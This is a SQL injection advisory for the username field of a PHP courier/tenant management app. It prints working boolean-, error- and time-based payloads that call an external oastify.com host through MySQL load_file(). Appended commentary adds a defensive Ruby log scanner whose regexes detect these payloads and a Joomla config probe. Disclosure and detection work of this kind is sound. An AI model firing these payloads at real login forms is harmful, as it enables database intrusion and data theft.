<pre><code>## Titles: TENANT-LIMITED-1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 05/20/2024<br />## Vendor: https://mayurik.com/<br />## Software:<br />https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select load_file('\\\\<br />h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+' was submitted<br />in the username parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed. The attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=nlWcgulD'+(select load_file('\\\\<br />h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' OR NOT<br />7856=7856 OR 'qylg'='WmKA&password=q7L!w3j!P7<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: username=nlWcgulD'+(select load_file('\\\\<br />h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' AND (SELECT<br />5737 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT<br />(ELT(5737=5737,1))),0x7171786b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'bruW'='pbdw&password=q7L!w3j!P7<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=nlWcgulD'+(select load_file('\\\\<br 
/>h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' AND (SELECT<br />4762 FROM (SELECT(SLEEP(7)))iyAW) OR 'ryQj'='epQU&password=q7L!w3j!P7<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/tenant-limited-1-104585030)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/05/tenant-limited-10-sqli.html)<br /><br />## Time spent:<br />00:39:00<br /><br /></code></pre>
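The two nu11secur1ty advisories on this page (the `kw` parameter above the Chaos RAT module and the `username` parameter here) describe the same out-of-band technique, `load_file()` on a UNC path that makes the database server resolve an attacker-chosen hostname, and the Joomla script earlier on the page shows what a hit on `/api/index.php/v1/config/application?public=true` leaks. As an added example serving both (my own Ruby, not code from any of the advisories), the scanner below runs a few signatures over constructed request records of the kind a reverse proxy with request-body logging would emit as JSON lines; every host, path, timestamp and body in `SAMPLE_LOG` is invented. It flags the Joomla config probe, rating it critical when the server answered 200 (the database credentials were served and need rotating), plus the load_file/UNC, time-based and error-based SQLi patterns in percent-decoded query strings and bodies. `scan_log`, `decoded_text` and the rule ids are my own names.

```ruby
require 'json'
require 'cgi'

# Constructed JSON-lines request log (invented hosts, paths, bodies and times).
SAMPLE_LOG = <<~'LOG'
  {"ts":"2024-05-22T10:01:02Z","src":"203.0.113.7","method":"GET","path":"/api/index.php/v1/config/application","query":"public=true","status":200,"body":""}
  {"ts":"2024-05-22T10:01:05Z","src":"198.51.100.9","method":"GET","path":"/index.php","query":"option=com_content","status":200,"body":""}
  {"ts":"2024-05-22T10:02:11Z","src":"203.0.113.7","method":"POST","path":"/app/search.php","query":"","status":200,"body":"kw=hello%27%2B%28select+load_file%28%27%5C%5C%5C%5Cprobe.example.invalid%5C%5Cabc%27%29%29%2B%27"}
  {"ts":"2024-05-22T10:02:20Z","src":"203.0.113.7","method":"POST","path":"/app/login.php","query":"","status":200,"body":"username=admin%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%287%29%29%29x%29--+&password=x"}
  {"ts":"2024-05-22T10:03:00Z","src":"198.51.100.9","method":"POST","path":"/app/login.php","query":"","status":302,"body":"username=alice&password=hunter2"}
LOG

# Query string and body, percent-decoded so encoded payloads are matched on
# their decoded form (the regexes below are case-insensitive).
def decoded_text(rec)
  CGI.unescape("#{rec['query']} #{rec['body']}")
end

RULES = [
  {
    id: 'joomla-config-disclosure',
    match: ->(rec) {
      rec['path'].to_s.downcase.end_with?('/api/index.php/v1/config/application') &&
        rec['query'].to_s.include?('public=true')
    }
  },
  {
    # load_file('\\ : a UNC path handed to MySQL, the out-of-band trick in the advisories
    id: 'sqli-oob-load_file',
    match: ->(rec) { decoded_text(rec).match?(/load_file\s*\(\s*'\\\\/i) }
  },
  {
    id: 'sqli-time-based',
    match: ->(rec) { decoded_text(rec).match?(/\b(?:sleep|benchmark)\s*\(/i) }
  },
  {
    id: 'sqli-error-based',
    match: ->(rec) { decoded_text(rec).match?(/floor\s*\(\s*rand\s*\(|information_schema\./i) }
  }
].freeze

# Scans JSON-lines text and returns one finding (a Hash) per matching record.
def scan_log(text)
  text.each_line.each_with_object([]) do |line, findings|
    line = line.strip
    next if line.empty?

    rec = JSON.parse(line)
    hits = RULES.select { |rule| rule[:match].call(rec) }.map { |rule| rule[:id] }
    next if hits.empty?

    # A 200 on the Joomla endpoint means the config (DB credentials) was served,
    # not merely probed, so the record is escalated.
    served = hits.include?('joomla-config-disclosure') && rec['status'] == 200
    findings << {
      ts: rec['ts'], src: rec['src'], method: rec['method'], path: rec['path'],
      status: rec['status'], rules: hits,
      severity: served ? 'critical' : 'high'
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |finding| puts finding.to_json }
end
```

Run against a real proxy export, the same three findings from one source address within two minutes are the pattern worth an alert on their own; the per-rule severity only decides how fast. Ordinary access logs do not carry POST bodies, so the two SQLi rules need body logging (or a WAF log) to fire, while the Joomla rule works on any access log that records the query string.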